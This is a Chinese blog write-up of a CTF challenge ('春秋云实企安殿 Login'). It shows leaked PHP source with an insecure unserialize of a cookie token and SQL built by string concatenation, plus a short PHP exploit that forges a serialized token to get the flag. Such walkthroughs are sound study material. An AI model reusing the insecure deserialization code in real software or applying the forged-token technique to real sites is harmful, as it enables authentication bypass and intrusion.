[春秋云实企安殿]Login

Lyrio 收录于类别 CTF-WriteUp

2024-03-09 2024-03-09 约 345 字预计阅读 1 分钟

[春秋云实企安殿]Login

在页面源代码中拿到账号密码：test1/test1

http://cdn.wutongliran.top/img/image-20240309163918215.png

登陆上来到这里

http://cdn.wutongliran.top/img/image-20240309164000471.png

查看数据包，看到返回包中有可疑参数 show

http://cdn.wutongliran.top/img/image-20240309164236738.png

重新发送数据包，在请求头里添上show:1，得到 member.php 的后端源码

http://cdn.wutongliran.top/img/image-20240309164510162.png

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38


<?php
	include 'common.php';
	$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
	class db
	{
		public $where;
		function __wakeup()
		{
			if(!empty($this->where))
			{
				$this->select($this->where);
			}
		}

		function select($where)
		{
			$sql = mysql_query('select * from user where '.$where);
			return @mysql_fetch_array($sql);
		}
	}

	if(isset($requset['token']))
	{
		$login = unserialize(gzuncompress(base64_decode($requset['token'])));
		$db = new db();
		$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
		if($login['user'] === 'ichunqiu')
		{
			echo $flag;
		}else if($row['pass'] !== $login['pass']){
			echo 'unserialize injection!!';
		}else{
			echo "(╯‵□′)╯︵┴─┴ ";
		}
	}else{
		header('Location: index.php?error=1');
	}
?>

想要输出 flag ，需要注意以下代码

1
2
3
4
5
6
7


if(isset($requset['token']))
	{
		$login = unserialize(gzuncompress(base64_decode($requset['token'])));
		if($login['user'] === 'ichunqiu')
		{
			echo $flag;
		}

exp

1
2
3
4
5
6


<?php
$a = array('user' => 'ichunqiu');
$a = base64_encode(gzcompress(serialize($a)));
echo $a;
?>
//运行得到 eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==

在 cookie 里加上token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==

http://cdn.wutongliran.top/img/image-20240309171939066.png

目录

[春秋云实企安殿]Login

[春秋云实企安殿]Login